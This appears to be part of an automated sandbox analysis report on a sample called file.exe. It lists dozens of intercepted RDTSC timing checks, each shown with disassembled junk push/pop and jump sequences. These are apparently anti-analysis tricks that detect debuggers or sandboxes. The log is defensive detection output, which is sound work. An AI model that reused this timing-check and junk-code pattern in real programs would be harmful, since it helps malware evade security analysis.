                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A53B0 second address: 11A53CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FAC81C965h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A53CA second address: 11A53CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A53CF second address: 11A53D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A53D5 second address: 11A53DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB5DD second address: 11EB5E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB96E second address: 11EB97D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EBB0A second address: 11EBB14 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3FAC81C956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EBC30 second address: 11EBC3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F3FACC550D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EBE10 second address: 11EBE15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EBE15 second address: 11EBE1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EBF31 second address: 11EBF35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1223B17 second address: 1223B1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224079 second address: 122407D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122407D second address: 1224083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224083 second address: 12240B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F3FAC81C967h 0x00000013 jmp 00007F3FAC81C95Fh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12240B6 second address: 12240C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F3FACC550D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12240C0 second address: 12240C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12277F1 second address: 12277FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3FACC550D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12277FB second address: 122782F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FAC81C968h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3FAC81C966h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122782F second address: 1227833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1230EF2 second address: 1230EFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F3FAC81C956h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1230EFC second address: 1230F27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e jmp 00007F3FACC550E4h 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1230F27 second address: 1230F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FAC81C968h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123121F second address: 1231223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1231223 second address: 1231255 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FAC81C962h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F3FAC81C96Ah 0x00000011 jmp 00007F3FAC81C95Eh 0x00000016 jng 00007F3FAC81C956h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1231544 second address: 1231548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1231548 second address: 1231554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1231554 second address: 1231576 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F3FACC550E4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F3FACC550DCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1231D3B second address: 1231D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FAC81C967h 0x00000009 jns 00007F3FAC81C956h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1231D63 second address: 1231D67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123220D second address: 1232213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1230A66 second address: 1230A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1230A6E second address: 1230A77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1237622 second address: 1237626 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1237626 second address: 123762F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1237904 second address: 1237913 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007F3FACC550D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123A292 second address: 123A296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123A296 second address: 123A29C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A1D68 second address: 11A1D8A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3FAC81C96Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A1D8A second address: 11A1DA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550E4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123E2EC second address: 123E2F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF4A5 second address: 11AF4C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F3FACC550D6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007F3FACC550E0h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF4C8 second address: 11AF4CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF4CC second address: 11AF4D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DA1F second address: 123DA2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DA2A second address: 123DA2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DA2E second address: 123DA71 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007F3FAC81C95Ch 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3FAC81C960h 0x00000016 jc 00007F3FAC81C96Ch 0x0000001c pushad 0x0000001d popad 0x0000001e jmp 00007F3FAC81C964h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DA71 second address: 123DA77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DA77 second address: 123DA7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DD03 second address: 123DD09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DD09 second address: 123DD1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F3FAC81C956h 0x0000000f ja 00007F3FAC81C956h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DD1E second address: 123DD3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550E2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DD3A second address: 123DD3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DD3E second address: 123DD48 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3FACC550D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DD48 second address: 123DD6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F3FAC81C96Dh 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DEA5 second address: 123DEC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FACC550E3h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jnp 00007F3FACC550D6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123DEC8 second address: 123DEEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F3FAC81C966h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12435D6 second address: 12435EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 jmp 00007F3FACC550DDh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1243939 second address: 1243945 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1243CDF second address: 1243D13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550E4h 0x00000007 push eax 0x00000008 js 00007F3FACC550D6h 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007F3FACC550DEh 0x00000019 push eax 0x0000001a pushad 0x0000001b popad 0x0000001c pop eax 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1243D13 second address: 1243D25 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3FAC81C95Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1243D25 second address: 1243D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC17E second address: 11EC183 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC183 second address: 11EC189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC31A second address: 11EC36B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jnc 00007F3FAC81C956h 0x0000000e jmp 00007F3FAC81C965h 0x00000013 popad 0x00000014 pop edx 0x00000015 nop 0x00000016 mov dword ptr [ebp+122D33D1h], edi 0x0000001c push 0000001Eh 0x0000001e mov cl, al 0x00000020 mov ecx, dword ptr [ebp+122D1BEFh] 0x00000026 nop 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a push esi 0x0000002b pop esi 0x0000002c jmp 00007F3FAC81C964h 0x00000031 popad 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1243E83 second address: 1243E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1243E89 second address: 1243E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124402C second address: 1244048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3FACC550DBh 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e jbe 00007F3FACC550D6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B0F0F second address: 11B0F2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F3FAC81C964h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124766E second address: 1247680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1247680 second address: 12476A3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F3FAC81C967h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12476A3 second address: 12476A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12476A7 second address: 12476B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3FAC81C956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124784C second address: 1247854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1247854 second address: 124787D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FAC81C95Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F3FAC81C956h 0x00000011 jmp 00007F3FAC81C963h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124787D second address: 1247896 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F3FACC550D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jl 00007F3FACC550DEh 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1247896 second address: 124789E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124789E second address: 12478A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3FACC550D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12478A8 second address: 12478BC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3FAC81C956h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F3FAC81C956h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D5D4 second address: 124D5F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550E8h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D5F4 second address: 124D5F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D773 second address: 124D781 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3FACC550D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D781 second address: 124D787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D787 second address: 124D78B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D78B second address: 124D791 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D791 second address: 124D79F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F3FACC550DEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D79F second address: 124D7A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124DC25 second address: 124DC2A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124DC2A second address: 124DC38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F3FAC81C956h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124E1FD second address: 124E21F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a js 00007F3FACC550D6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jp 00007F3FACC550D6h 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124E21F second address: 124E236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FAC81C95Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124E4F1 second address: 124E4F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124E4F6 second address: 124E504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F3FAC81C956h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125411F second address: 1254144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FACC550DBh 0x00000009 jl 00007F3FACC550D6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F3FACC550DBh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1254144 second address: 1254148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12533A3 second address: 12533AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F3FACC550D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12538A0 second address: 12538B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FAC81C95Dh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12538B2 second address: 12538DC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3FACC550DEh 0x00000008 jmp 00007F3FACC550DAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3FACC550DCh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12538DC second address: 12538E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12538E2 second address: 12538E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
